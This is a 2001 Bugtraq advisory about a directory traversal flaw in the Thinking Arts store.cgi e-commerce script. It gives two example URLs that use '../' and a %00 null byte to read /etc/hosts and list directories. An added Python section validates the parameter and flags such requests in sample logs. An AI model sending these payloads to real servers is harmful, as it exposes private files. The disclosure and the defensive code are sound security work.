Bugtraq mailing list archives
Thinking Arts Store.cgi Directory Traversal
From: slipy () B10Z NET
Date: Fri, 16 Feb 2001 07:14:01 -0000
Introduction:

Thinking Arts LTD E-Commerce package comes with a webstore frontend called store.cgi which allows people to basically order products on their website over a SQL database.

The vendor's website is: http://www.thinkingarts.com/

Problem: Simple Directory Traversal

Adding the string "/../" to a URL allows an attacker to view any file on the server, and also list directories within the server which the owner of the vulnerable httpd has permissions to access. Remote execution of commands does not appear to be possible with this directory traversal bug, but directory listings are.

Please note that you do need the %00.html at the end of your command.

Examples:

http://www.VULNERABLE.com/cgi-bin/store.cgi?StartID=../etc/hosts%00.html
^^ = Will obviously open the hosts file.

http://www.VULNERABLE.com/cgi-bin/store.cgi?StartID=../etc/%00.html
^^ = Will obviously list the /etc/ directory.

Solution:

Vendor has been contacted. No reply from them yet, and seeing only 3 sites who signed up for their dumb service are affected, so it doesn't really matter now does it?

--------------------
b10z cgi advisory.
slipy () b10z net
February 16th, 2001.
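The two things a defender wants for the bug described above, as an added example that is not part of the advisory or of Thinking Arts' code: a StartID resolver that refuses null bytes (the %00 that cuts off the appended ".html" in a NUL-terminated open()) and anything outside the document root, and a scan over access-log lines that flags the traversal requests. The document root and the log lines are assumed and constructed for the demo.

```python
import os
import re
from urllib.parse import unquote

DOCROOT = "/var/www/store"   # assumed document root for the demo (hypothetical)
VALID_ID = re.compile(r"[A-Za-z0-9_-]{1,64}")

def safe_store_path(start_id, docroot=DOCROOT):
    """Map a StartID parameter to a page under docroot, or return None to refuse it.

    The advisory's payloads rely on "../" to leave the script's directory and on a
    %00 byte so that the ".html" the script appends is cut off by the C library's
    NUL-terminated open(). Both are refused here before any path is built.
    """
    decoded = unquote(start_id)            # the CGI sees the URL-decoded value
    if "\x00" in decoded:                  # null-byte truncation of the appended suffix
        return None
    if not VALID_ID.fullmatch(decoded):    # allowlist: no "/", "\\", "." or empty ids
        return None
    root = os.path.realpath(docroot)
    candidate = os.path.realpath(os.path.join(root, decoded + ".html"))
    # Belt and braces: even a valid-looking id must resolve inside the document root.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate

# Constructed access-log lines (combined format) for the detection demo; not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Feb/2001:07:14:01 +0000] "GET /cgi-bin/store.cgi?StartID=welcome HTTP/1.0" 200 2310',
    '10.0.0.9 - - [16/Feb/2001:07:15:22 +0000] "GET /cgi-bin/store.cgi?StartID=../etc/hosts%00.html HTTP/1.0" 200 412',
    '10.0.0.9 - - [16/Feb/2001:07:15:40 +0000] "GET /cgi-bin/store.cgi?StartID=..%2Fetc%2F%00.html HTTP/1.0" 200 1980',
]
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+)')

def flag_traversal_requests(lines):
    """Return the log lines whose request target, after URL decoding, contains a
    dot-dot path segment or a NUL byte; decoding twice also catches double encoding."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        target = unquote(unquote(m.group(1)))
        if re.search(r"\.\.[/\\]|\x00", target):
            hits.append(line)
    return hits

if __name__ == "__main__":
    for sid in ("welcome", "../etc/hosts%00.html", "../etc/%00.html"):
        print(repr(sid), "->", safe_store_path(sid))
    print(len(flag_traversal_requests(SAMPLE_LOG)), "suspicious request(s)")
```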